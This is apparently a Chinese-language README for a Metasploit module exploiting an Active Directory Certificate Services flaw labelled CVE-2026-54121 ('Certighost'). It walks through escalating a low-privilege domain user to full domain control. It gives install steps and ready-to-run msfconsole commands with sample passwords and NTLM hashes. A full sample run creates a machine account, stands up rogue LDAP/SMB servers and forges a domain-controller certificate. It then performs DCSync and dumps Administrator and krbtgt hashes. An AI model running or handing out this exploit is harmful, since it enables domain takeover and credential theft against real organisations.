Certighost 最初由 h0j3n 和 Aniq Fakhrul 发现并利用。本仓库包含一个 Metasploit 辅助模块,通过滥用 AD CS 注册的“chase”回退机制,可将任意低权限域用户提升至完全控制域。攻击者可胁迫 CA 回连攻击者控制的基础设施进行身份认证,并签发一个冒充域控制器的证书。该证书用于 PKINIT,UnPAC-the-hash 可恢复 DC 的 NT 哈希,其余工作由 DCSync 完成。
mkdir -p ~/.msf4/modules/auxiliary/admin/dcerpc
cp cve_2026_54121_certighost.rb ~/.msf4/modules/auxiliary/admin/dcerpc/
验证其能否解析并加载:
ruby -c ~/.msf4/modules/auxiliary/admin/dcerpc/cve_2026_54121_certighost.rb
msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; show options; exit"
389 和 445 端口是特权端口,因此该模块必须以 root 身份运行。
MSF 单行命令
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set PASSWORD 'Passw0rd!'; set DC_IP 10.0.0.10; set ACTION FULL; run"
运行 msfconsole
use auxiliary/admin/dcerpc/cve_2026_54121_certighost
set DOMAIN corp.local
set USERNAME jdoe
set PASSWORD 'Passw0rd!'
set DC_IP 10.0.0.10
set ACTION FULL
run
MSF 单行命令
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set NTLM_HASH 69289a87353c7083842956a62652d46c; set DC_IP 10.0.0.10; set ACTION FULL; run"
运行 msfconsole
use auxiliary/admin/dcerpc/cve_2026_54121_certighost
set DOMAIN corp.local
set USERNAME jdoe
set NTLM_HASH 69289a87353c7083842956a62652d46c
set DC_IP 10.0.0.10
set ACTION FULL
run
NTLM_HASH 接受纯 NT 哈希、:NT 或 LM:NT。当同时设置 PASSWORD 和 NTLM_HASH 时,以哈希为准。
当您需要离线或稍后使用证书时,此模式非常有用:
sudo msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN corp.local; set USERNAME jdoe; set PASSWORD 'Passw0rd!'; set DC_IP 10.0.0.10; set ACTION REQUEST_CERT; run"
$ msfconsole -q -x "use auxiliary/admin/dcerpc/cve_2026_54121_certighost; set DOMAIN contoso.lab; set USERNAME lowpriv; set PASSWORD Abc123,./; set DC_IP 192.168.10.10; set ACTION FULL; run"
[*] Starting persistent handler(s)...
[*] Setting default action FULL - view all 3 actions with the show actions command
DOMAIN => contoso.lab
USERNAME => lowpriv
PASSWORD => Abc123,./
DC_IP => 192.168.10.10
ACTION => FULL
[*] Certighost (CVE-2026-54121)
[*] Step 1: Discovering infrastructure via LDAP...
[*] Discovering CA...
[+] Found CA: ContosoCert-CA (DC01.contoso.lab)
[*] Discovering target DC...
[+] Target DC: DC01$ (DC01.contoso.lab)
[+] CA: ContosoCert-CA (192.168.10.10)
[+] Target: DC01$
[+] Domain SID: S-1-5-21-2005457936-2008376057-2514283296
[*] Step 2: Creating machine account via SAMR...
[+] Successfully created contoso.lab\GHOSTGQJZBJLO$
[+] Password: CGf0a69633d2Aa1
[+] SID: S-1-5-21-2005457936-2008376057-2514283296-1756
[+] Created: contoso.lab\GHOSTGQJZBJLO$
[*] Step 3: Starting rogue servers...
[*] Listener IP: 192.168.44.128
[+] Rogue LDAP server: 192.168.44.128:389
[+] Rogue SMB server: 192.168.44.128:445
[*] Pre-flighting Netlogon oracle...
[*] Connecting to the endpoint mapper service...
[+] Netlogon oracle ready
[*] Step 4: Requesting certificate via ICertPassage...
[+] Certificate issued!
[+] PFX (loot): /root/.msf4/loot/20260731030034_default_192.168.10.10_windows.ad.cs_287527.pfx
[+] PFX (local): /root/DC01_certighost.pfx
[+] Subject: /CN=DC01.contoso.lab
[+] Issuer: /DC=lab/DC=contoso/CN=ContosoCert-CA
[*] Step 5: Performing PKINIT as DC01$...
[+] PKINIT successful - TGT for [email protected]
[+] ccache saved: /root/DC01.ccache
[*] Extracting NT hash from PAC...
[+] 192.168.10.10:88 - Received a valid TGS-Response
[*] 192.168.10.10:445 - TGS MIT Credential Cache ticket saved to /root/.msf4/loot/20260731030034_default_192.168.10.10_mit.kerberos.cca_639932.bin
[+] NT Hash: dc01$:aad3b435b51404eeaad3b435b51404ee:846704be57649a259c45b8ce773dcf8d
[*] Step 6: Performing DCSync...
[*] Running DCSync as contoso.lab\DC01$ (output shown when complete)...
# NTLM hashes:
Administrator:500:aad3b435b51404eeaad3b435b51404ee:8c3efc486704d2ee71eebe71af14d86c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:72446150d4b9a4dae4f0472fbb01b072:::
contoso.lab\lowpriv:1105:aad3b435b51404eeaad3b435b51404ee:69289a87353c7083842956a62652d46c:::
DC01$:1000:aad3b435b51404eeaad3b435b51404ee:846704be57649a259c45b8ce773dcf8d:::
DESKTOP-JSB2FG3$:1106:aad3b435b51404eeaad3b435b51404ee:b7ca2860c012a21801407b5f5c45c453:::
GHOSTQMSEUHWX$:1751:aad3b435b51404eeaad3b435b51404ee:3e5e99d282391e10226f3d40111196ee:::
GHOSTGQJZBJLO$:1756:aad3b435b51404eeaad3b435b51404ee:cbe6ca2d2dffb6069be63ee0700a05cb:::
# Password history (pwdump format - uid:rid:lmhash:nthash:::):
Administrator_history0:500:aad3b435b51404eeaad3b435b51404ee:8c3efc486704d2ee71eebe71af14d86c:::
contoso.lab\lowpriv_history0:1105:82e343ae06e69d44033ee76a390286a8:8c3efc486704d2ee71eebe71af14d86c:::
DC01$_history0:1000:aad3b435b51404eeaad3b435b51404ee:3795fa26828ec5e8bf0dc948d2d82bbe:::
DESKTOP-JSB2FG3$_history0:1106:dbfadcdb0dd4f78c286e856dcc5ece74:a175b9f66ecd598f5bcf8185d0e2e322:::
[+] DCSync complete - 26 secret line(s) shown, others suppressed for opsec
[*] (SIDs, full pwdump, account info and kerberos-key sections hidden)
[*] Cleaning up: deleting GHOSTGQJZBJLO$ as Administrator (Administrator hash from DCSync)...
[+] The specified account has been deleted.
[+] Deleted GHOSTGQJZBJLO$
[*] Auxiliary module execution completed
msf auxiliary(admin/dcerpc/cve_2026_54121_certighost) > show options
Module options (auxiliary/admin/dcerpc/cve_2026_54121_certighost):